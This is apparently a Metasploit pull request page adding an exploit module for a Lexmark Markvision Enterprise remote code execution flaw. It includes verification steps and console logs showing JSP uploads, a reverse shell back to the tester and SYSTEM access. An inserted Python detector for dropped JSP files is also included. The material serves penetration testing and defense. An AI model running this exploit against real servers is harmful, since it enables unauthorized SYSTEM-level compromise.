Add module for ZDI-14-410 Lexmark Markvision Enterprise RCE #4476

Merged
merged 3 commits into from Jan 12, 2015

Conversation

jvazquez-r7
Contributor

Verification

  • Install Windows 2003 SP2
  • Install Lexmark Markvision Enterprise 2.0.0. It can be downloaded from: http://media.lexmark.com/www/package/markvision/MVE-2.0.0/MVE-2.0.0.exe
  • Verify that the webapp runs correctly on port 9788/TCP
  • Run msfconsole
  • Use the module: use exploit/windows/http/lexmark_markvision_gfd_upload
  • set RHOST
  • run check, verify the target appears as vulnerable.
msf > use exploit/windows/http/lexmark_markvision_gfd_upload
msf exploit(lexmark_markvision_gfd_upload) > set rhost 172.16.158.133
rhost => 172.16.158.133
msf exploit(lexmark_markvision_gfd_upload) > check
[*] 172.16.158.133:9788 - The target appears to be vulnerable.
  • run exploit, verify you get a SYSTEM session back
msf exploit(lexmark_markvision_gfd_upload) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:9788 - Uploading info leak JSP 0YMi.jsp...
[+] 172.16.158.133:9788 - JSP successfully uploaded
[+] 172.16.158.133:9788 - Working directory found in C:\Program Files\Lexmark\Markvision Enterprise\tomcat
[*] 172.16.158.133:9788 - Uploading JSP payload Vs0EjhB.jsp...
[+] 172.16.158.133:9788 - JSP successfully uploaded
[*] 172.16.158.133:9788 - Executing payload...
[*] Command shell session 2 opened (172.16.158.1:4444 -> 172.16.158.133:1416) at 2014-12-29 10:39:20 -0600
/webapps/ROOT/0YMi.jsp Files\Lexmark\Markvision Enterprise\tomcat
/webapps/ROOT/Vs0EjhB.jsples\Lexmark\Markvision Enterprise\tomcat

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>echo 2591175977;echo czOhXOibvlvtseuiicWFVxoUIZMxyKfe
2591175977;echo czOhXOibvlvtseuiicWFVxoUIZMxyKfe

\webapps\ROOT\0YMi.jsp" & echo " ' >/dev/null;echo JnJfKaLXyYQfxXIoetfwrFGGJsFLyfDFrise\tomcaton Enterprise\tomcat
" ' >/dev/null;echo JnJfKaLXyYQfxXIoetfwrFGGJsFLyfDF

C:\WINDOWS\system32>
\webapps\ROOT\Vs0EjhB.jsp" & echo " ' >/dev/null;echo PkPxLUOwwZglussibtPGxrkXTdFyILterise\tomcaton Enterprise\tomcat
" ' >/dev/null;echo PkPxLUOwwZglussibtPGxrkXTdFyILte

C:\WINDOWS\system32>
C:\WINDOWS\system32>whoami
whoami
nt authority\system
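
A defender-side check for the artifacts this module leaves behind, as an added example that is not part of the pull request or of Metasploit: it walks a Tomcat webapps/ROOT directory and flags JSP files that are not on an allowlist and were either written recently or reference process-execution APIs. The Markvision path is the one shown in the session output above; the sample webroot, file names, file contents and allowlist are constructed for the demonstration.

```python
# Added example, not code from the pull request or from Metasploit.
import os
import tempfile
import time
from typing import Iterable, List

# Tomcat root taken from the module output above; pass your own path on other hosts.
MARKVISION_ROOT = r"C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webapps\ROOT"

# Java calls that a stock Markvision page should not need (assumption, tune per deployment).
EXEC_MARKERS = (b"Runtime.getRuntime()", b"ProcessBuilder")


def find_suspicious_jsp(webroot: str, allowlist: Iterable[str] = (),
                        max_age_seconds: float = 86400.0) -> List[str]:
    """Return JSP files under webroot that are not allowlisted and were either
    modified within max_age_seconds or contain a process-execution marker."""
    allowed = {n.lower() for n in allowlist}
    now = time.time()
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(".jsp") or name.lower() in allowed:
                continue
            path = os.path.join(dirpath, name)
            try:
                mtime = os.stat(path).st_mtime
                with open(path, "rb") as fh:
                    head = fh.read(65536)  # first 64 KiB is enough for a marker scan
            except OSError:
                continue  # file vanished or unreadable; skip rather than crash the sweep
            recent = (now - mtime) <= max_age_seconds
            has_exec = any(marker in head for marker in EXEC_MARKERS)
            if recent or has_exec:
                hits.append(path)
    return sorted(hits)


def demo_scan() -> List[str]:
    """Build a constructed sample webroot (not a real install) and scan it."""
    root = tempfile.mkdtemp(prefix="mve_root_")
    samples = {
        "index.jsp": b"<html>constructed: legitimate landing page</html>",
        "0YMi.jsp": b"<%-- constructed: freshly dropped, unknown page --%>",
        "Vs0EjhB.jsp": b"<%-- constructed: mentions Runtime.getRuntime() --%>",
        "report.jsp": b"<html>constructed: old but harmless</html>",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    old = time.time() - 90 * 86400  # age report.jsp so only its content could flag it
    os.utime(os.path.join(root, "report.jsp"), (old, old))
    return [os.path.basename(p) for p in find_suspicious_jsp(root, allowlist=["index.jsp"])]
```

Run against the real webroot with the deployment's own allowlist; the two names returned by the demo correspond to the recently written and marker-bearing files.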

@wchen-r7
Contributor

msf exploit(lexmark_markvision_gfd_upload) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.80:9788 - Uploading info leak JSP g5N6TXroDZorXiyBarikxaeunlv.jsp...
[+] 192.168.1.80:9788 - JSP successfully uploaded
[+] 192.168.1.80:9788 - Working directory found in C:\Program Files\Lexmark\Markvision Enterprise\tomcat
[*] 192.168.1.80:9788 - Uploading JSP payload SVZcZE5BejZbzYQ4nzTdUBzWJOX3.jsp...
[+] 192.168.1.80:9788 - JSP successfully uploaded
[*] 192.168.1.80:9788 - Executing payload...
[*] Command shell session 1 opened (192.168.1.64:4444 -> 192.168.1.80:1072) at 2015-01-12 10:43:33 -0600

@wchen-r7 wchen-r7 merged commit d2af956 into rapid7:master Jan 12, 2015